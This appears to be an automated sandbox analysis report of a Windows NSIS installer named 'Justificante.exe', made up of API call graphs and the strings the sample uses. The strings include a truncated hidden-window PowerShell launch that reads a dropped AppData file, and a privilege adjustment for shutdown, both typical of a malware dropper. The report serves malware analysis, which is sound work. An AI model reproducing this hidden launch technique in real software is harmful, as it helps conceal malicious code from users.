SetDlgItemTextW 4269->4270 4270->4262 4565 4019ff 4566 402d3e 17 API calls 4565->4566 4567 401a06 4566->4567 4568 402d3e 17 API calls 4567->4568 4569 401a0f 4568->4569 4570 401a16 lstrcmpiW 4569->4570 4571 401a28 lstrcmpW 4569->4571 4572 401a1c 4570->4572 4571->4572 4573 401000 4574 401037 BeginPaint GetClientRect 4573->4574 4575 40100c DefWindowProcW 4573->4575 4577 4010f3 4574->4577 4578 401179 4575->4578 4579 401073 CreateBrushIndirect FillRect DeleteObject 4577->4579 4580 4010fc 4577->4580 4579->4577 4581 401102 CreateFontIndirectW 4580->4581 4582 401167 EndPaint 4580->4582 4581->4582 4583 401112 6 API calls 4581->4583 4582->4578 4583->4582 4584 401d81 4585 401d94 GetDlgItem 4584->4585 4586 401d87 4584->4586 4588 401d8e 4585->4588 4587 402d1c 17 API calls 4586->4587 4587->4588 4589 401dd5 GetClientRect LoadImageW SendMessageW 4588->4589 4590 402d3e 17 API calls 4588->4590 4592 401e33 4589->4592 4594 401e3f 4589->4594 4590->4589 4593 401e38 DeleteObject 4592->4593 4592->4594 4593->4594 3459 402482 3460 402d3e 17 API calls 3459->3460 3461 402494 3460->3461 3462 402d3e 17 API calls 3461->3462 3463 40249e 3462->3463 3476 402dce 3463->3476 3466 4024d6 3470 4024e2 3466->3470 3480 402d1c 3466->3480 3467 402d3e 17 API calls 3471 4024cc lstrlenW 3467->3471 3468 402925 3469 402501 RegSetValueExW 3474 402517 RegCloseKey 3469->3474 3470->3469 3483 403309 3470->3483 3471->3466 3474->3468 3477 402de9 3476->3477 3498 4063d7 3477->3498 3481 406579 17 API calls 3480->3481 3482 402d31 3481->3482 3482->3470 3484 403334 3483->3484 3485 403318 SetFilePointer 3483->3485 3502 403411 GetTickCount 3484->3502 3485->3484 3488 4033d1 3488->3469 3489 4060b5 ReadFile 3490 403354 3489->3490 3490->3488 3491 403411 42 API calls 3490->3491 3492 40336b 3491->3492 3492->3488 3493 4033d7 ReadFile 3492->3493 3495 40337a 3492->3495 3493->3488 3495->3488 3496 4060b5 ReadFile 3495->3496 3497 4060e4 WriteFile 3495->3497 3496->3495 3497->3495 3499 4063e6 3498->3499 3500 4063f1 RegCreateKeyExW 3499->3500 3501 4024ae 3499->3501 3500->3501 3501->3466 3501->3467 3501->3468 3503 403569 3502->3503 3504 40343f 3502->3504 3505 402fc6 32 API calls 3503->3505 3515 403590 SetFilePointer 3504->3515 3511 40333b 3505->3511 3507 40344a SetFilePointer 3513 40346f 3507->3513 3511->3488 3511->3489 3512 4060e4 WriteFile 3512->3513 3513->3511 3513->3512 3514 40354a SetFilePointer 3513->3514 3516 40357a 3513->3516 3519 406aac 3513->3519 3526 402fc6 3513->3526 3514->3503 3515->3507 3517 4060b5 ReadFile 3516->3517 3518 40358d 3517->3518 3518->3513 3520 406ad1 3519->3520 3523 406ad9 3519->3523 3520->3513 3521 406b60 GlobalFree 3522 406b69 GlobalAlloc 3521->3522 3522->3520 3522->3523 3523->3520 3523->3521 3523->3522 3524 406be0 GlobalAlloc 3523->3524 3525 406bd7 GlobalFree 3523->3525 3524->3520 3524->3523 3525->3524 3527 402fd7 3526->3527 3528 402fef 3526->3528 3529 402fe0 DestroyWindow 3527->3529 3532 402fe7 3527->3532 3530 402ff7 3528->3530 3531 402fff GetTickCount 3528->3531 3529->3532 3541 40696d 3530->3541 3531->3532 3534 40300d 3531->3534 3532->3513 3535 403042 CreateDialogParamW ShowWindow 3534->3535 3536 403015 3534->3536 3535->3532 3536->3532 3545 402faa 3536->3545 3538 403023 wsprintfW 3539 4055a4 24 API calls 3538->3539 3540 403040 3539->3540 3540->3532 3542 40698a PeekMessageW 3541->3542 3543 406980 DispatchMessageW 3542->3543 3544 40699a 3542->3544 3543->3542 3544->3532 3546 402fb9 3545->3546 3547 402fbb MulDiv 3545->3547 3546->3547 3547->3538 3548 402902 3549 402d3e 17 API calls 3548->3549 3550 402909 FindFirstFileW 3549->3550 3551 402931 3550->3551 3554 40291c 3550->3554 3556 406483 wsprintfW 3551->3556 3553 40293a 3557 40653c lstrcpynW 3553->3557 3556->3553 3557->3554 4595 404602 lstrlenW 4596 404621 4595->4596 4597 404623 WideCharToMultiByte 4595->4597 4596->4597 4598 401503 4599 40150b 4598->4599 4601 40151e 4598->4601 4600 402d1c 17 API calls 4599->4600 4600->4601 4602 404983 4603 4049c0 4602->4603 4604 4049af 4602->4604 4606 4049cc GetDlgItem 4603->4606 4612 404a2b 4603->4612 4663 405b86 GetDlgItemTextW 4604->4663 4609 4049e0 4606->4609 4607 404b0f 4661 404cbe 4607->4661 4665 405b86 GetDlgItemTextW 4607->4665 4608 4049ba 4610 4067eb 5 API calls 4608->4610 4611 4049f4 SetWindowTextW 4609->4611 4615 405ebc 4 API calls 4609->4615 4610->4603 4616 404492 18 API calls 4611->4616 4612->4607 4617 406579 17 API calls 4612->4617 4612->4661 4614 4044f9 8 API calls 4619 404cd2 4614->4619 4620 4049ea 4615->4620 4621 404a10 4616->4621 4622 404a9f SHBrowseForFolderW 4617->4622 4618 404b3f 4623 405f19 18 API calls 4618->4623 4620->4611 4627 405e11 3 API calls 4620->4627 4624 404492 18 API calls 4621->4624 4622->4607 4625 404ab7 CoTaskMemFree 4622->4625 4626 404b45 4623->4626 4628 404a1e 4624->4628 4629 405e11 3 API calls 4625->4629 4666 40653c lstrcpynW 4626->4666 4627->4611 4664 4044c7 SendMessageW 4628->4664 4631 404ac4 4629->4631 4634 404afb SetDlgItemTextW 4631->4634 4638 406579 17 API calls 4631->4638 4633 404a24 4636 406931 5 API calls 4633->4636 4634->4607 4635 404b5c 4637 406931 5 API calls 4635->4637 4636->4612 4644 404b63 4637->4644 4640 404ae3 lstrcmpiW 4638->4640 4639 404ba4 4667 40653c lstrcpynW 4639->4667 4640->4634 4641 404af4 lstrcatW 4640->4641 4641->4634 4643 404bab 4645 405ebc 4 API calls 4643->4645 4644->4639 4649 405e5d 2 API calls 4644->4649 4650 404bfc 4644->4650 4646 404bb1 GetDiskFreeSpaceW 4645->4646 4648 404bd5 MulDiv 4646->4648 4646->4650 4648->4650 4649->4644 4651 404c6d 4650->4651 4653 404e08 20 API calls 4650->4653 4652 404c90 4651->4652 4654 40140b 2 API calls 4651->4654 4668 4044b4 KiUserCallbackDispatcher 4652->4668 4655 404c5a 4653->4655 4654->4652 4657 404c6f SetDlgItemTextW 4655->4657 4658 404c5f 4655->4658 4657->4651 4660 404d3f 20 API calls 4658->4660 4659 404cac 4659->4661 4662 4048dc SendMessageW 4659->4662 4660->4651 4661->4614 4662->4661 4663->4608 4664->4633 4665->4618 4666->4635 4667->4643 4668->4659 4669 402889 4670 402890 4669->4670 4671 402b0d 4669->4671 4672 402d1c 17 API calls 4670->4672 4673 402897 4672->4673 4674 4028a6 SetFilePointer 4673->4674 4674->4671 4675 4028b6 4674->4675 4677 406483 wsprintfW 4675->4677 4677->4671 4678 40190c 4679 401943 4678->4679 4680 402d3e 17 API calls 4679->4680 4681 401948 4680->4681 4682 405c4e 67 API calls 4681->4682 4683 401951 4682->4683 4684 40190f 4685 402d3e 17 API calls 4684->4685 4686 401916 4685->4686 4687 405ba2 MessageBoxIndirectW 4686->4687 4688 40191f 4687->4688 4689 407090 4693 406adf 4689->4693 4690 40744a 4691 406b60 GlobalFree 4692 406b69 GlobalAlloc 4691->4692 4692->4690 4692->4693 4693->4690 4693->4691 4693->4692 4693->4693 4694 406be0 GlobalAlloc 4693->4694 4695 406bd7 GlobalFree 4693->4695 4694->4690 4694->4693 4695->4694 4696 401491 4697 4055a4 24 API calls 4696->4697 4698 401498 4697->4698 4706 401f12 4707 402d3e 17 API calls 4706->4707 4708 401f18 4707->4708 4709 402d3e 17 API calls 4708->4709 4710 401f21 4709->4710 4711 402d3e 17 API calls 4710->4711 4712 401f2a 4711->4712 4713 402d3e 17 API calls 4712->4713 4714 401f33 4713->4714 4715 401423 24 API calls 4714->4715 4716 401f3a 4715->4716 4723 405b68 ShellExecuteExW 4716->4723 4718 401f82 4719 4069dc 5 API calls 4718->4719 4720 402925 4718->4720 4721 401f9f CloseHandle 4719->4721 4721->4720 4723->4718 4724 402614 4725 402d3e 17 API calls 4724->4725 4726 40261b 4725->4726 4729 406032 GetFileAttributesW CreateFileW 4726->4729 4728 402627 4729->4728 3587 402596 3599 402d7e 3587->3599 3590 402d1c 17 API calls 3591 4025a9 3590->3591 3592 4025b8 3591->3592 3595 402925 3591->3595 3593 4025d1 RegEnumValueW 3592->3593 3594 4025c5 RegEnumKeyW 3592->3594 3596 4025ed RegCloseKey 3593->3596 3597 4025e6 3593->3597 3594->3596 3596->3595 3597->3596 3600 402d3e 17 API calls 3599->3600 3601 402d95 3600->3601 3602 4063a9 RegOpenKeyExW 3601->3602 3603 4025a0 3602->3603 3603->3590 4730 401d17 4731 402d1c 17 API calls 4730->4731 4732 401d1d IsWindow 4731->4732 4733 401a20 4732->4733 3857 405518 3858 405528 3857->3858 3859 40553c 3857->3859 3860 40552e 3858->3860 3870 405585 3858->3870 3861 405564 3859->3861 3862 405544 IsWindowVisible 3859->3862 3864 4044de SendMessageW 3860->3864 3863 40558a CallWindowProcW 3861->3863 3876 404ecd 3861->3876 3865 405551 3862->3865 3862->3870 3867 405538 3863->3867 3864->3867 3871 404e4d SendMessageW 3865->3871 3870->3863 3872 404e70 GetMessagePos ScreenToClient SendMessageW 3871->3872 3873 404eac SendMessageW 3871->3873 3874 404ea9 3872->3874 3875 404ea4 3872->3875 3873->3875 3874->3873 3875->3861 3885 40653c lstrcpynW 3876->3885 3878 404ee0 3886 406483 wsprintfW 3878->3886 3880 404eea 3881 40140b 2 API calls 3880->3881 3882 404ef3 3881->3882 3887 40653c lstrcpynW 3882->3887 3884 404efa 3884->3870 3885->3878 3886->3880 3887->3884 4741 401b9b 4742 401ba8 4741->4742 4743 401bec 4741->4743 4744 401c31 4742->4744 4749 401bbf 4742->4749 4745 401bf1 4743->4745 4746 401c16 GlobalAlloc 4743->4746 4748 406579 17 API calls 4744->4748 4755 402395 4744->4755 4745->4755 4762 40653c lstrcpynW 4745->4762 4747 406579 17 API calls 4746->4747 4747->4744 4750 40238f 4748->4750 4760 40653c lstrcpynW 4749->4760 4756 405ba2 MessageBoxIndirectW 4750->4756 4752 401c03 GlobalFree 4752->4755 4754 401bce 4761 40653c lstrcpynW 4754->4761 4756->4755 4758 401bdd 4763 40653c lstrcpynW 4758->4763 4760->4754 4761->4758 4762->4752 4763->4755 4764 402b9d SendMessageW 4765 402bc2 4764->4765 4766 402bb7 InvalidateRect 4764->4766 4766->4765 4767 40149e 4768 402395 4767->4768 4769 4014ac PostQuitMessage 4767->4769 4769->4768 3894 402522 3895 402d7e 17 API calls 3894->3895 3896 40252c 3895->3896 3897 402d3e 17 API calls 3896->3897 3898 402535 3897->3898 3899 402540 RegQueryValueExW 3898->3899 3904 402925 3898->3904 3900 402560 3899->3900 3901 402566 RegCloseKey 3899->3901 3900->3901 3905 406483 wsprintfW 3900->3905 3901->3904 3905->3901 4770 4021a2 4771 402d3e 17 API calls 4770->4771 4772 4021a9 4771->4772 4773 402d3e 17 API calls 4772->4773 4774 4021b3 4773->4774 4775 402d3e 17 API calls 4774->4775 4776 4021bd 4775->4776 4777 402d3e 17 API calls 4776->4777 4778 4021c7 4777->4778 4779 402d3e 17 API calls 4778->4779 4781 4021d1 4779->4781 4780 402210 CoCreateInstance 4785 40222f 4780->4785 4781->4780 4782 402d3e 17 API calls 4781->4782 4782->4780 4783 401423 24 API calls 4784 4022ee 4783->4784 4785->4783 4785->4784 3975 4015a3 3976 402d3e 17 API calls 3975->3976 3977 4015aa SetFileAttributesW 3976->3977 3978 4015bc 3977->3978 3979 401fa4 3980 402d3e 17 API calls 3979->3980 3981 401faa 3980->3981 3982 4055a4 24 API calls 3981->3982 3983 401fb4 3982->3983 3984 405b25 2 API calls 3983->3984 3985 401fba 3984->3985 3986 401fdd CloseHandle 3985->3986 3990 402925 3985->3990 3994 4069dc WaitForSingleObject 3985->3994 3986->3990 3989 401fcf 3991 401fd4 3989->3991 3992 401fdf 3989->3992 3999 406483 wsprintfW 3991->3999 3992->3986 3995 4069f6 3994->3995 3996 406a08 GetExitCodeProcess 3995->3996 3997 40696d 2 API calls 3995->3997 3996->3989 3998 4069fd WaitForSingleObject 3997->3998 3998->3995 3999->3986 4001 4023aa 4002 4023b2 4001->4002 4003 4023b8 4001->4003 4004 402d3e 17 API calls 4002->4004 4005 4023c6 4003->4005 4007 402d3e 17 API calls 4003->4007 4004->4003 4006 4023d4 4005->4006 4008 402d3e 17 API calls 4005->4008 4009 402d3e 17 API calls 4006->4009 4007->4005 4008->4006 4010 4023dd WritePrivateProfileStringW 4009->4010 4793 40202a 4794 402d3e 17 API calls 4793->4794 4795 402031 4794->4795 4796 406931 5 API calls 4795->4796 4797 402040 4796->4797 4798 4020c4 4797->4798 4799 40205c GlobalAlloc 4797->4799 4799->4798 4800 402070 4799->4800 4801 406931 5 API calls 4800->4801 4802 402077 4801->4802 4803 406931 5 API calls 4802->4803 4804 402081 4803->4804 4804->4798 4808 406483 wsprintfW 4804->4808 4806 4020b6 4809 406483 wsprintfW 4806->4809 4808->4806 4809->4798 4810 402f2b 4811 402f56 4810->4811 4812 402f3d SetTimer 4810->4812 4813 402fa4 4811->4813 4814 402faa MulDiv 4811->4814 4812->4811 4815 402f64 wsprintfW SetWindowTextW SetDlgItemTextW 4814->4815 4815->4813 4018 40242c 4019 402434 4018->4019 4020 40245f 4018->4020 4021 402d7e 17 API calls 4019->4021 4022 402d3e 17 API calls 4020->4022 4023 40243b 4021->4023 4024 402466 4022->4024 4025 402445 4023->4025 4029 402473 4023->4029 4030 402dfc 4024->4030 4027 402d3e 17 API calls 4025->4027 4028 40244c RegDeleteValueW RegCloseKey 4027->4028 4028->4029 4031 402e10 4030->4031 4032 402e09 4030->4032 4031->4032 4034 402e41 4031->4034 4032->4029 4035 4063a9 RegOpenKeyExW 4034->4035 4036 402e6f 4035->4036 4037 402f24 4036->4037 4038 402e79 4036->4038 4037->4032 4039 402e7f RegEnumValueW 4038->4039 4043 402ea2 4038->4043 4040 402f09 RegCloseKey 4039->4040 4039->4043 4040->4037 4041 402ede RegEnumKeyW 4042 402ee7 RegCloseKey 4041->4042 4041->4043 4044 406931 5 API calls 4042->4044 4043->4040 4043->4041 4043->4042 4045 402e41 6 API calls 4043->4045 4046 402ef7 4044->4046 4045->4043 4047 402f19 4046->4047 4048 402efb RegDeleteKeyW 4046->4048 4047->4037 4048->4037 4817 401a30 4818 402d3e 17 API calls 4817->4818 4819 401a39 ExpandEnvironmentStringsW 4818->4819 4820 401a4d 4819->4820 4822 401a60 4819->4822 4821 401a52 lstrcmpW 4820->4821 4820->4822 4821->4822 4096 401735 4097 402d3e 17 API calls 4096->4097 4098 40173c SearchPathW 4097->4098 4099 401757 4098->4099 4828 402636 4829 402665 4828->4829 4830 40264a 4828->4830 4831 402695 4829->4831 4832 40266a 4829->4832 4833 402d1c 17 API calls 4830->4833 4835 402d3e 17 API calls 4831->4835 4834 402d3e 17 API calls 4832->4834 4840 402651 4833->4840 4836 402671 4834->4836 4837 40269c lstrlenW 4835->4837 4845 40655e WideCharToMultiByte 4836->4845 4837->4840 4839 402685 lstrlenA 4839->4840 4841 4026df 4840->4841 4842 4026c9 4840->4842 4844 406113 5 API calls 4840->4844 4842->4841 4843 4060e4 WriteFile 4842->4843 4843->4841 4844->4842 4845->4839 4846 401d38 4847 402d1c 17 API calls 4846->4847 4848 401d3f 4847->4848 4849 402d1c 17 API calls 4848->4849 4850 401d4b GetDlgItem 4849->4850 4851 402630 4850->4851 4852 4014b8 4853 4014be 4852->4853 4854 401389 2 API calls 4853->4854 4855 4014c6 4854->4855 4115 403fb9 4116 403fd1 4115->4116 4117 40410c 4115->4117 4116->4117 4118 403fdd 4116->4118 4119 40411d GetDlgItem GetDlgItem 4117->4119 4124 40415d 4117->4124 4121 403fe8 SetWindowPos 4118->4121 4122 403ffb 4118->4122 4123 404492 18 API calls 4119->4123 4120 4041b7 4125 4044de SendMessageW 4120->4125 4130 404107 4120->4130 4121->4122 4126 404000 ShowWindow 4122->4126 4127 404018 4122->4127 4128 404147 SetClassLongW 4123->4128 4124->4120 4129 401389 2 API calls 4124->4129 4154 4041c9 4125->4154 4126->4127 4131 404020 DestroyWindow 4127->4131 4132 40403a 4127->4132 4133 40140b 2 API calls 4128->4133 4134 40418f 4129->4134 4135 40441b 4131->4135 4136 404050 4132->4136 4137 40403f SetWindowLongW 4132->4137 4133->4124 4134->4120 4140 404193 SendMessageW 4134->4140 4135->4130 4146 40444c ShowWindow 4135->4146 4138 4040f9 4136->4138 4139 40405c GetDlgItem 4136->4139 4137->4130 4145 4044f9 8 API calls 4138->4145 4143 40408c 4139->4143 4144 40406f SendMessageW IsWindowEnabled 4139->4144 4140->4130 4141 40140b 2 API calls 4141->4154 4142 40441d DestroyWindow EndDialog 4142->4135 4148 404099 4143->4148 4150 4040e0 SendMessageW 4143->4150 4151 4040ac 4143->4151 4160 404091 4143->4160 4144->4130 4144->4143 4145->4130 4146->4130 4147 406579 17 API calls 4147->4154 4148->4150 4148->4160 4149 404492 18 API calls 4149->4154 4150->4138 4155 4040b4 4151->4155 4156 4040c9 4151->4156 4152 40446b SendMessageW 4153 4040c7 4152->4153 4153->4138 4154->4130 4154->4141 4154->4142 4154->4147 4154->4149 4161 404492 18 API calls 4154->4161 4177 40435d DestroyWindow 4154->4177 4158 40140b 2 API calls 4155->4158 4157 40140b 2 API calls 4156->4157 4159 4040d0 4157->4159 4158->4160 4159->4138 4159->4160 4160->4152 4162 404244 GetDlgItem 4161->4162 4163 404261 ShowWindow KiUserCallbackDispatcher 4162->4163 4164 404259 4162->4164 4186 4044b4 KiUserCallbackDispatcher 4163->4186 4164->4163 4166 40428b EnableWindow 4171 40429f 4166->4171 4167 4042a4 GetSystemMenu EnableMenuItem SendMessageW 4168 4042d4 SendMessageW 4167->4168 4167->4171 4168->4171 4170 403f9a 18 API calls 4170->4171 4171->4167 4171->4170 4187 4044c7 SendMessageW 4171->4187 4188 40653c lstrcpynW 4171->4188 4173 404303 lstrlenW 4174 406579 17 API calls 4173->4174 4175 404319 SetWindowTextW 4174->4175 4176 401389 2 API calls 4175->4176 4176->4154 4177->4135 4178 404377 CreateDialogParamW 4177->4178 4178->4135 4179 4043aa 4178->4179 4180 404492 18 API calls 4179->4180 4181 4043b5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4180->4181 4182 401389 2 API calls 4181->4182 4183 4043fb 4182->4183 4183->4130 4184 404403 ShowWindow 4183->4184 4185 4044de SendMessageW 4184->4185 4185->4135 4186->4166 4187->4171 4188->4173 4856 4028bb 4857 4028c1 4856->4857 4858 4028c9 FindClose 4857->4858 4859 402bc2 4857->4859 4858->4859 4860 40493c 4861 404972 4860->4861 4862 40494c 4860->4862 4863 4044f9 8 API calls 4861->4863 4864 404492 18 API calls 4862->4864 4865 40497e 4863->4865 4866 404959 SetDlgItemTextW 4864->4866 4866->4861

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 4035d8-403615 SetErrorMode GetVersion 1 403617-40361f call 406931 0->1 2 403628 0->2 1->2 8 403621 1->8 3 40362d-403641 call 4068c1 lstrlenA 2->3 9 403643-40365f call 406931 * 3 3->9 8->2 16 403670-4036cf #17 OleInitialize SHGetFileInfoW call 40653c GetCommandLineW call 40653c 9->16 17 403661-403667 9->17 24 4036d1-4036d8 16->24 25 4036d9-4036f3 call 405e3e CharNextW 16->25 17->16 22 403669 17->22 22->16 24->25 28 4036f9-4036ff 25->28 29 40380a-403824 GetTempPathW call 4035a7 25->29 31 403701-403706 28->31 32 403708-40370c 28->32 36 403826-403844 GetWindowsDirectoryW lstrcatW call 4035a7 29->36 37 40387c-403896 DeleteFileW call 403068 29->37 31->31 31->32 34 403713-403717 32->34 35 40370e-403712 32->35 38 4037d6-4037e3 call 405e3e 34->38 39 40371d-403723 34->39 35->34 36->37 54 403846-403876 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4035a7 36->54 57 403947-403957 call 403b19 OleUninitialize 37->57 58 40389c-4038a2 37->58 55 4037e5-4037e6 38->55 56 4037e7-4037ed 38->56 43 403725-40372d 39->43 44 40373e-403777 39->44 45 403734 43->45 46 40372f-403732 43->46 47 403794-4037ce 44->47 48 403779-40377e 44->48 45->44 46->44 46->45 47->38 53 4037d0-4037d4 47->53 48->47 52 403780-403788 48->52 60 40378a-40378d 52->60 61 40378f 52->61 53->38 62 4037f5-403803 call 40653c 53->62 54->37 54->57 55->56 56->28 64 4037f3 56->64 75 403a7d-403a83 57->75 76 40395d-40396d call 405ba2 ExitProcess 57->76 65 403937-40393e call 403c0b 58->65 66 4038a8-4038b3 call 405e3e 58->66 60->47 60->61 61->47 72 403808 62->72 64->72 74 403943 65->74 77 403901-40390b 66->77 78 4038b5-4038ea 66->78 72->29 74->57 80 403b01-403b09 75->80 81 403a85-403a9b GetCurrentProcess OpenProcessToken 75->81 85 403973-403987 call 405b0d lstrcatW 77->85 86 40390d-40391b call 405f19 77->86 82 4038ec-4038f0 78->82 83 403b0b 80->83 84 403b0f-403b13 ExitProcess 80->84 88 403ad1-403adf call 406931 81->88 89 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 81->89 90 4038f2-4038f7 82->90 91 4038f9-4038fd 82->91 83->84 102 403994-4039ae lstrcatW lstrcmpiW 85->102 103 403989-40398f lstrcatW 85->103 86->57 101 40391d-403933 call 40653c * 2 86->101 99 403ae1-403aeb 88->99 100 403aed-403af8 ExitWindowsEx 88->100 89->88 90->91 95 4038ff 90->95 91->82 91->95 95->77 99->100 104 403afa-403afc call 40140b 99->104 100->80 100->104 101->65 102->57 106 4039b0-4039b3 102->106 103->102 104->80 110 4039b5-4039ba call 405a73 106->110 111 4039bc call 405af0 106->111 116 4039c1-4039cf SetCurrentDirectoryW 110->116 111->116 118 4039d1-4039d7 call 40653c 116->118 119 4039dc-403a05 call 40653c 116->119 118->119 123 403a0a-403a26 call 406579 DeleteFileW 119->123 126 403a67-403a6f 123->126 127 403a28-403a38 CopyFileW 123->127 126->123 128 403a71-403a78 call 406302 126->128 127->126 129 403a3a-403a5a call 406302 call 406579 call 405b25 127->129 128->57 129->126 138 403a5c-403a63 CloseHandle 129->138 138->126
                          APIs
                          • SetErrorMode.KERNELBASE ref: 004035FB
                          • GetVersion.KERNEL32 ref: 00403601
                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
                          • OleInitialize.OLE32(00000000), ref: 00403678
                          • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
                          • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Justificante.exe",00000020,"C:\Users\user\Desktop\Justificante.exe",00000000,?,00000007,00000009,0000000B), ref: 004036E1
                            • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                            • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403838
                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403854
                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
                          • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                            • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                          • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
                          • ExitProcess.KERNEL32 ref: 0040396D
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403980
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040398F
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040399A
                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
                          • DeleteFileW.KERNEL32(00420F08,00420F08,?,"powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\Justificante.exe,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
                          • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
                          • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                          • ExitProcess.KERNEL32 ref: 00403B13
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$"powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unavailability\unmeliorated$C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer$C:\Users\user\Desktop$C:\Users\user\Desktop\Justificante.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                          • API String ID: 3441113951-2951501894
                          • Opcode ID: 79b010d8ffa692541024cf2895b9fcb7f074167fc2173f366b29c6acfcbd45ef
                          • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
                          • Opcode Fuzzy Hash: 79b010d8ffa692541024cf2895b9fcb7f074167fc2173f366b29c6acfcbd45ef
                          • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E

                          Control-flow Graph

                          • Executed
                          • Not Executed
